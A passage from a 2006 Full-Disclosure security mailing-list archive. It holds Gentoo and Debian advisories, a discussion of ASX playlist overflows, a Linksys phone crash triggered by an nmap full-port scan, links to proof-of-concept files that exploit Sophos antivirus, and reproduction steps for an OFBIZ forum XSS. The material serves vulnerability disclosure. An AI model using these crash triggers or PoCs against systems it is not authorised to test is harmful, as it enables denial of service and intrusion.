hacking and experiences in hacker > culture. > > To understand this phenomenon, I am seeking individuals who are willing to share their > experiences and opinions in an interview which can be conducted either in person or via > encrypted e-mail. Strict confidentiality will be maintained and your privacy ensured. I have > obtained a Certificate of Confidentiality from the National Institutes of Health to further > protect and ensure your privacy and confidentiality. All individuals who complete an > interview will be paid $10 for their time, and $10 will also be paid for successful referrals. From pdxsharkey at gmail.com Sat Dec 9 02:56:24 2006 From: pdxsharkey at gmail.com (Sharkey) Date: Fri, 8 Dec 2006 18:56:24 -0800 Subject: [Full-disclosure] Call For Papers: SecurityOPUS 2007 Message-ID: <255f01860612081856l38760467o270f44b24546cb3e@mail.gmail.com> Call for Papers Security OPUS - Call for Papers March 19-20, 2006. San Francisco, California. USA http://www.securityopus.com/papers.phphttp://www.securityopus.com/papers.php Security OPUS is an annual meeting of professional security researchers and information security practioners. The conference is a single track series of presentations designed to focus on new research/advances in the field. We are looking to ensure each talk contains relevant and current research and/or addresses today's issues. One-hour and extended presentation sessions, provides attendees with a significant advantage, by being informed about current and future challenges. Submit to 'contact -at- securityOPUS - com Step 1. Submit abstract by JANUARY 30th 2007. Talk abstracts should be in plain text and contain: - Presenter name and contact info (e-mail, postal address, phone, fax). - Brief biography, list of publications, employer or relevant associations. - Talk title and summary The review committee assesses the relevance of your abstract to the conference, your qualifications to be presenting your proposed topic, and your rationale. Step 2. Committee Review The program committee will review your proposal per the guidelines above. Notification of acceptance will follow. Step 3 Submit Slides by FEBRUARY 15th, 2007 Your talk slides should be submitted for review by February 15th, 2007. We ask that you submit this content in PDF format to facilitate publication and distribution of the content. Fine Print Publication Rights The conference requires non-exclusive publication rights to submitted papers including the publication of audio and video proceedings. Copyright is retained by the author. We do ask that we be the first organization to publish any given paper. Failure to Submit In the event that a deadline is missed we reserve the right to revoke any offer to present. From info at beskerming.com Fri Dec 8 06:53:02 2006 From: info at beskerming.com (=?ISO-8859-1?Q?S=FBnnet_Beskerming?=) Date: Fri, 8 Dec 2006 17:23:02 +1030 Subject: [Full-disclosure] ASX Playlists and Jumping to Conclusions Message-ID: Hi list(s), The recent coverage of ASX Playlist issues seems somewhat strange. For the uninitiated, here is a quick wrapup: XMPlay ASX buffer overflow PoC code posted to milw0rm - 21 November This PoC demonstrated an exploitable buffer overflow condition in the handling of 'ref href' URIs. A CVE entry (CVE-2006-6063 - though this only identifies the .m3u method of exploiting the vulnerability) appears around the same time, and reporting is carried by the usual third parties. With no fix present, this remains an effective 0-day (plus, with existing malware targeting .asx files it could make for interesting real-world use). Windows Media Player DoS code posted to BugTraq - 22 November Oddly, this code represented an almost exact duplicate of the buffer overflow demonstrated the day before, only with the exploit payload removed and replaced with a bunch of 'A's, and fails to draw much interest from third parties. It isn't until eEye publishes data on this issue (and increases the perceived threat posed) on their 0-day reporting / information site that it attracts some attention from other reporting parties (such as FrSIRT on 7 December), though uptake is slow. Leaving Chinese Soup's critique (BugTraq) of eEye's analysis aside (why they haven't identified on the XMPlay vulnerability is another question), users need to be aware that if they replace WMP with XMPlay as the default handler of .asx content, then they are potentially creating a much riskier environment than if they accept the current DoS risk against their platform. If this particular code release had appropriate accompanying documentation, it would be possible to work out whether it is a derivative of the earlier code, or fortuitous timing on something found independently. Criticism has been recently levelled against third party reporting bodies for failing to adequately investigate reports (after one of the recent MoKB OS X corrupted .dmg file handling errors), and the way that information is flowing between, and being distributed by, third party reporting bodies in this case is showing similar patterns. In summary: - There is a known 0-day targeting a vulnerability in XMPlay's handling of malicious .asx (and other content types) data passed via 'ref href' that can lead to arbitrary code execution. - There is a known DoS targeting WMP that is exploited via a long string passed via 'ref href' and using the .asx media type - There has been no proven link between the two disclosures - It has yet to be shown that the WMP vulnerability leads to arbitrary code execution - The advice to replace WMP as the default .asx filetype handler can lead to an increased security risk if the replacement application is XMPlay (accepting arbitrary code execution in an effort to avoid a DoS). Sincerely, Carl Jongsma info at beskerming.com S?nnet Beskerming Pty. Ltd. Adelaide, Australia http://www.beskerming.com S?nnet Beskerming Pty. Ltd. Established in mid 2004, S?nnet Beskerming Pty. Ltd. is the sister company to Jongsma & Jongsma Pty. Ltd., and was formed to develop and commercialise advanced Information Security research. S?nnet Beskerming Pty. Ltd. is an Information Security specialist and, in conjunction with the tools developed in house, provides total security solutions and services, from the perimeter to internal data stores, including web application security and security testing and analysis. From andfarm at gmail.com Sat Dec 9 06:53:31 2006 From: andfarm at gmail.com (Andrew Farmer) Date: Fri, 8 Dec 2006 22:53:31 -0800 Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture In-Reply-To: References: Message-ID: <9A11C528-EE5F-421B-B10E-239E873D9E7C@gmail.com> On 08 Dec 06, at 12:47, Evan Stawnyczy wrote: ^^^^^^^^^ > My name is Evan ($LastNameNotDisclosed$). Nice job with the last-name-non-disclosure. From jaervosz at gentoo.org Sat Dec 9 07:45:17 2006 From: jaervosz at gentoo.org (Sune Kloppenborg Jeppesen) Date: Sat, 9 Dec 2006 08:45:17 +0100 Subject: [Full-disclosure] [ GLSA 200612-02 ] xine-lib: Buffer overflow Message-ID: <200612090845.22690.jaervosz@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200612-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: xine-lib: Buffer overflow Date: December 09, 2006 Bugs: #156645 ID: 200612-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== xine-lib is vulnerable to a buffer overflow in the Real Media input plugin, which could lead to the execution of arbitrary code. Background ========== xine is a portable and reusable multimedia playback engine. xine-lib is xine's core engine. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-libs/xine-lib < 1.1.2-r3 >= 1.1.2-r3 Description =========== A possible buffer overflow has been reported in the Real Media input plugin. Impact ====== An attacker could exploit this vulnerability by enticing a user into loading a specially crafted stream with xine or an application using xine-lib. This can lead to a Denial of Service and possibly the execution of arbitrary code with the rights of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All xine-lib users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/xine-lib-1.1.2-r3" References ========== [ 1 ] CVE-2006-6172 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6172 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061209/52db51b3/attachment.bin From jmm at debian.org Sat Dec 9 09:39:51 2006 From: jmm at debian.org (Moritz Muehlenhoff) Date: Sat, 9 Dec 2006 10:39:51 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1231-1] New gnupg packages fix arbitrary code execution Message-ID: <20061209093951.GA4453@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1231-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff December 9th, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : gnupg Vulnerability : several Problem-Type : local(remote) Debian-specific: no CVE ID : CVE-2006-6169 CVE-2006-6235 Debian Bug : 401894 401898 401914 Several remote vulnerabilities have been discovered in the GNU privacy, a free PGP replacement, which may lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2006-6169 Werner Koch discovered that a buffer overflow in a sanitising function may lead to execution of arbitrary code when running gnupg interactively. CVE-2006-6235 Tavis Ormandy discovered that parsing a carefully crafted OpenPGP packet may lead to the execution of arbitrary code, as a function pointer of an internal structure may be controlled through the decryption routines. For the stable distribution (sarge) these problems have been fixed in version 1.4.1-1.sarge6. For the upcoming stable distribution (etch) these problems have been fixed in version 1.4.6-1. For the unstable distribution (sid) these problems have been fixed in version 1.4.6-1. We recommend that you upgrade your gnupg packages. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge6.dsc Size/MD5 checksum: 680 f99d9936fdb3d87b37f719d4f507702a http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge6.diff.gz Size/MD5 checksum: 22889 219b13435d4594c530614638590b65d3 http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1.orig.tar.gz Size/MD5 checksum: 4059170 1cc77c6943baaa711222e954bbd785e5 Alpha architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge6_alpha.deb Size/MD5 checksum: 2156230 950520b2391eb6444593c66a8e96d6c3 AMD64 architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge6_amd64.deb Size/MD5 checksum: 1963738 589ab9ab433e000e919a38f558f54f5e ARM architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge6_arm.deb Size/MD5 checksum: 1899822 158ed8fe21da9e2b8c730b3b2acce9a8 HP Precision architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge6_hppa.deb Size/MD5 checksum: 2004374 9daff80c38cf65bb299fb5ee370d44d6 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge6_i386.deb Size/MD5 checksum: 1909194 8752d3578b55a7fd1535bba18ca0770c Intel IA-64 architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge6_ia64.deb Size/MD5 checksum: 2325806 38fa7bb8def3d1a296aa6aa3432561a3 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge6_m68k.deb Size/MD5 checksum: 1811222 f51182d8badb7c2b0ef42b78c71be16d Big endian MIPS architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge6_mips.deb Size/MD5 checksum: 2001184 cc087abacd572bed64a2ab191d863946 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge6_mipsel.deb Size/MD5 checksum: 2007888 c42342dd898361ed9fcee1bdc8edc3e2 PowerPC architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge6_powerpc.deb Size/MD5 checksum: 1958036 ff8ee1d008561ce87732847e895024ec IBM S/390 architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge6_s390.deb Size/MD5 checksum: 1967406 693212d3c1b12bf7f6f204daa0531f6a Sun Sparc architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge6_sparc.deb Size/MD5 checksum: 1897740 3821e5e9e69241324d781fe78ed1ace7 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFeoPuXm3vHE4uyloRArcbAJsGzoXS3Xl9t9akefxJHs4LwA/jGgCePz5H r0I2nsRhJ4SqkHFwCWmPiFY= =J9lh -----END PGP SIGNATURE----- From collin at betaversion.net Sat Dec 9 10:33:02 2006 From: collin at betaversion.net (Collin R. Mulliner) Date: Sat, 09 Dec 2006 11:33:02 +0100 Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash from Nmap scan In-Reply-To: References: Message-ID: <1165660385.10738.42.camel@panic> what about doing some investigation? Like figuring out which protocol and port the crash relates to. Then send some "random" stuff to that port and see what happens. You could find some real interesting stuff... see http://www.mulliner.org/pocketpc/ Collin On Wed, 2006-12-06 at 10:40 -0800, Shawn Merdinger wrote: > Vulnerability Description > ================== > The Linksys WIP 330 VoIP wireless phone will crash when a full > port-range Nmap scan is run against its IP address. > > > Linksys WIP 330 Firmware Version > ========================== > 1.00.06A > > > Nmap scan command > ================ > nmap -P0 -p 1-65535 > > > Impact > ===== > The crash is only after Nmap has finished. The Nmap scan also seems to > disrupt updating of the display as the clock is not updated. The crash > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2 > operating system. > > Screenshot of the crash: http://www.flickr.com/photos/metalmijn/295348294/ > > > Credit > ==== > Credit for discovering this vulnerability goes to Armijn Hemel > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- Collin R. Mulliner BETAVERSiON Systems [www.betaversion.net] info/pgp: finger collin at betaversion.net USS Enterprise Bumperstricker: Our other starship separates into 3 pieces! From pucik at overflow.pl Sat Dec 9 07:56:10 2006 From: pucik at overflow.pl (Damian Put) Date: Sat, 9 Dec 2006 08:56:10 +0100 Subject: [Full-disclosure] iDefense Security Advisory 12.08.06: Sophos Antivirus CHM File Heap Overflow Vulnerability In-Reply-To: <4579EDA5.9090104@idefense.com> References: <4579EDA5.9090104@idefense.com> Message-ID: <20061209085610.c21349e0.pucik@overflow.pl> Hi, There are some PoC if someone's interested... > Sophos Antivirus CHM File Heap Overflow Vulnerability http://overflow.pl/poc/sophos_chunkheap.chm > Sophos Antivirus CHM Chunk Name Length Memory Corruption Vulnerability http://overflow.pl/poc/sophos_namelen.chm > Multiple Vendor Antivirus RAR File Denial of Service Vulnerability http://overflow.pl/poc/sophos_intifiniti.rar Best regards, Damian Put From eriks00 at moon.lv Sat Dec 9 13:01:04 2006 From: eriks00 at moon.lv (=?utf-8?B?xJJyaWtz?=) Date: Sat, 9 Dec 2006 15:01:04 +0200 (EET) Subject: [Full-disclosure] (no subject) Message-ID: <1079.87.110.139.202.1165669264.squirrel@www.biti.lv> Open source ERP and e-commerce package OFBIZ has an XSS vulnerability in the forum functionality. This was initially posted on Ofbiz JIRA issue tracking system (https://issues.apache.org/jira/browse/OFBIZ-178) on 22/Aug/06. I last verified it in revision 469895 (1/Nov/06), and it was still present. As far as I know (and from activity on JIRA) nothing has changed. Repeating the vulnerability is straight forward: 1) Install OFBIZ; 2) Disable JavaScript in browser; 3) Log in and browse to forum (with default install you will see Browse Forums/Gizmos on the left side); 4) Post a message like 5) Enable JavaScript; So if you are a customer going to some vendor's OFBIZ site, don't go to Forums section as you might be affected (if your JavaScript is enabled). If you are using OFBIZ for your e-commerce site, disable all forum functionality until the vulnerability is fixed. ?riks Dobelis http://www.biti.lv/ From dudevanwinkle at gmail.com Sat Dec 9 13:45:42 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Sat, 9 Dec 2006 08:45:42 -0500 Subject: [Full-disclosure] Google pageranked 4 doamin on sale... In-Reply-To: <21ae1b060612081602n5b3e368ha0f47ce6f8662908@mail.gmail.com> References: <21ae1b060612080550x24e0ed4fg4dc2340e7b02b67e@mail.gmail.com> <21ae1b060612081602n5b3e368ha0f47ce6f8662908@mail.gmail.com> Message-ID: whoops! 0Crap, I guess pagerank isnt based on content as I thought it was.. http://www.webworkshop.net/pagerank.html sorry bout that. So, correct me if I am wrong, but according to pagerank: if you have a reciprocal link with microsoft.com about patches, this increases your rank and because of that, your page about platypuses on the same site would get higher listings in the search results accordingly. I am totally off base with that one. -JP From jmm at debian.org Sat Dec 9 14:43:33 2006 From: jmm at debian.org (Moritz Muehlenhoff) Date: Sat, 9 Dec 2006 15:43:33 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1232-1] New clamav packages fix denial of service Message-ID: <20061209144333.GA4225@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1232-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff December 9th, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : clamav Vulnerability : missing sanity checks Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-5874 Stephen Gran discovered that malformed base64-encoded MIME attachments can lead to denial of service through a null pointer dereference. For the stable distribution (sarge) this problem has been fixed in version 0.84-2.sarge.12. For the upcoming stable distribution (etch) this problem has been fixed in version 0.86-1. For the unstable distribution (sid) this problem has been fixed in version 0.86-1. We recommend that you upgrade your clamav package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.12.dsc Size/MD5 checksum: 874 5b916037233c2d9d181ea83f1d42d712 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.12.diff.gz Size/MD5 checksum: 177238 a782b435ee944e318fc88c4a0cdb67b2 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84.orig.tar.gz Size/MD5 checksum: 4006624 c43213da01d510faf117daa9a4d5326c Architecture independent components: http://security.debian.org/pool/updates/main/c/clamav/clamav-base_0.84-2.sarge.12_all.deb Size/MD5 checksum: 154928 b32d2d2ece27947abc7b7c6330abf2b1 http://security.debian.org/pool/updates/main/c/clamav/clamav-docs_0.84-2.sarge.12_all.deb Size/MD5 checksum: 694464 eb184049df134a9006667e6785c24c25 http://security.debian.org/pool/updates/main/c/clamav/clamav-testfiles_0.84-2.sarge.12_all.deb Size/MD5 checksum: 123944 62365dceb1d3080f1164ce0a972fdf25 Alpha architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.12_alpha.deb Size/MD5 checksum: 74764 be1106a34f9f141c035e5944b515d698 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.12_alpha.deb Size/MD5 checksum: 48832 16c19937df6b1e662518667bf0d0ee6f http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.12_alpha.deb Size/MD5 checksum: 2176478 42c9a257d406924bd2fcac05be372969 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.12_alpha.deb Size/MD5 checksum: 42112 19cf2cd6d553eba10a02ff592c12c94a http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.12_alpha.deb Size/MD5 checksum: 255854 038f4ce242d6db3705a8baf832e0e12f http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.12_alpha.deb Size/MD5 checksum: 285746 c0d001b91c29d95bd53737b2d7b5c547 AMD64 architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.12_amd64.deb Size/MD5 checksum: 68848 c0e28ed5358d1f5ebff13d61d6eb1eb4 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.12_amd64.deb Size/MD5 checksum: 44184 c88134266b22681595f3c7ed12334a4f http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.12_amd64.deb Size/MD5 checksum: 2173274 64577d98f3d80cfc1e6e74ff4d81fcd5 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.12_amd64.deb Size/MD5 checksum: 39996 b463aded3ec3448e8a577674cc257c31 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.12_amd64.deb Size/MD5 checksum: 176586 eeb2004aab6cc21d10384e5ca036a87c http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.12_amd64.deb Size/MD5 checksum: 259932 870f959c30fe9e7bcf48deac7fd6759b ARM architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.12_arm.deb Size/MD5 checksum: 63922 29edcdab52e56c2b72af6af97ca0c768 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.12_arm.deb Size/MD5 checksum: 39584 a8afdb2046b166a1b1f5b8a3e9b82e5e http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.12_arm.deb Size/MD5 checksum: 2171286 d8537b008fbb7bf022af9c388fd3e4ac http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.12_arm.deb Size/MD5 checksum: 37322 fd8f26bcf782fefba3c5a0530dcf2ec2 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.12_arm.deb Size/MD5 checksum: 174942 4e3f425067940ad951c5db80bedb1bde http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.12_arm.deb Size/MD5 checksum: 249834 941fa21a688be04473a079fca7e8a3b4 HP Precision architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.12_hppa.deb Size/MD5 checksum: 68282 2fb841851035efd52fefa7e724d590be http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.12_hppa.deb Size/MD5 checksum: 43280 d3c20fdeb6f4aebaa0dbe8ae90a5d184 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.12_hppa.deb Size/MD5 checksum: 2173744 4d0ea408992b3b0f96e7d17ff167a729 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.12_hppa.deb Size/MD5 checksum: 39452 c9c873ee637518fa15725c8490bf09bc http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.12_hppa.deb Size/MD5 checksum: 202738 457a65fb73cd55814e01dc86fe4e09d8 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.12_hppa.deb Size/MD5 checksum: 283560 80e6985db13798376fa0bd037180347b Intel IA-32 architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.12_i386.deb Size/MD5 checksum: 65210 e77f2ea59853a44c9de70078084818f7 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.12_i386.deb Size/MD5 checksum: 40316 a6277fe555ed016b66e31a8f12ae5900 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.12_i386.deb Size/MD5 checksum: 2171600 04bed8cc7a6fce37fadb00e7c3de0158 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.12_i386.deb Size/MD5 checksum: 38040 8f2f1d793f711032130b79374a3fe92d http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.12_i386.deb Size/MD5 checksum: 159766 ed10728241f21d9ca16958b69ef2835e http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.12_i386.deb Size/MD5 checksum: 254628 7a3362570c412ce45fef6af9836dc5a9 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.12_ia64.deb Size/MD5 checksum: 81826 d6ce185e7548aca1a6d9d5076dd02c62 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.12_ia64.deb Size/MD5 checksum: 55238 2048e4d1efbd87de9ab0bb0af1aad258 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.12_ia64.deb Size/MD5 checksum: 2180260 a2609594a563da9abfa754d24417a9c2 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.12_ia64.deb Size/MD5 checksum: 49194 017e5a956c866dfbf3fb25ac9ae9af92 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.12_ia64.deb Size/MD5 checksum: 252232 beb80dffdfc1bc355437f40b4694d783 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.12_ia64.deb Size/MD5 checksum: 317956 006317c527eac48b0328d53dab68863f Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.12_m68k.deb Size/MD5 checksum: 62522 7cbb98367bf49fcaaa4e17d740353fa1 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.12_m68k.deb Size/MD5 checksum: 38214 23b7e1072c74ead32b3c4de2732d90a6 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.12_m68k.deb Size/MD5 checksum: 2170512 24a34375e8aa0391b57695751778563c http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.12_m68k.deb Size/MD5 checksum: 35076 0a65ea328e6f2a9b6682dd5124dea45d http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.12_m68k.deb Size/MD5 checksum: 146374 257c0624826096b041dadfc21a722244 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.12_m68k.deb Size/MD5 checksum: 250616 6e80c1cf4c8bb7289e277c74d415e187 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.12_mips.deb Size/MD5 checksum: 67954 d241687159539050660a0b26e65ce420 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.12_mips.deb Size/MD5 checksum: 43788 464b8562f10bcb127cebd37192daaac9 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.12_mips.deb Size/MD5 checksum: 2173044 97ebd82f119d09500a4ff5ccd8c21cef http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.12_mips.deb Size/MD5 checksum: 37672 f39f4ff08d44f7e7994faf23b439af96 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.12_mips.deb Size/MD5 checksum: 195606 a206da343265cb7e8c780544036bd491 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.12_mips.deb Size/MD5 checksum: 257714 3d81be01bbdb7c0d48b4c97c8657c112 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.12_mipsel.deb Size/MD5 checksum: 67560 589421e196e11eb3536a2a8874af7d71 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.12_mipsel.deb Size/MD5 checksum: 43588 4822a893c5c7f476b9991ed8ff9930e1 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.12_mipsel.deb Size/MD5 checksum: 2173000 05c596728ad5d423d841522e5957e6e8 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.12_mipsel.deb Size/MD5 checksum: 37962 432ecd8c78aaa8ce80cd385ad5a4f0d8 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.12_mipsel.deb Size/MD5 checksum: 192076 77ab2250c971bb5f2a787cf904dc1176 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.12_mipsel.deb Size/MD5 checksum: 255302 b2806442ee7af4103edec95f86ed4bec PowerPC architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.12_powerpc.deb Size/MD5 checksum: 69294 f737048437ce5bfc2843d757005bf902 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.12_powerpc.deb Size/MD5 checksum: 44670 fc9c04bd42f2b377c85e1ca40c2889ba http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.12_powerpc.deb Size/MD5 checksum: 2173674 a4b694e07e459765d2ba80471b83ef28 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.12_powerpc.deb Size/MD5 checksum: 38876 0af124304eac3624be255d4e92dbc32b http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.12_powerpc.deb Size/MD5 checksum: 187746 7b632f5ce2a16725010d83847031c992 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.12_powerpc.deb Size/MD5 checksum: 265086 a81c89ca24d3fba3204278ec33ee3f2e IBM S/390 architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.12_s390.deb Size/MD5 checksum: 67892 9c6d6f8d31cfe729b0f14dc91f0111ed http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.12_s390.deb Size/MD5 checksum: 43564 8f0b63348907e2a45b905c6c631a53a4 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.12_s390.deb Size/MD5 checksum: 2172966 ac148963f872e961a99bda672d38bde4 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.12_s390.deb Size/MD5 checksum: 38910 f9bc46b646faacf26f825aac7afd35f5 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.12_s390.deb Size/MD5 checksum: 182718 cdce561be2f6cb23b1b29d834b2abac7 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.12_s390.deb Size/MD5 checksum: 269694 168fdcd3e7231fac67facaffdbd30744 Sun Sparc architecture: 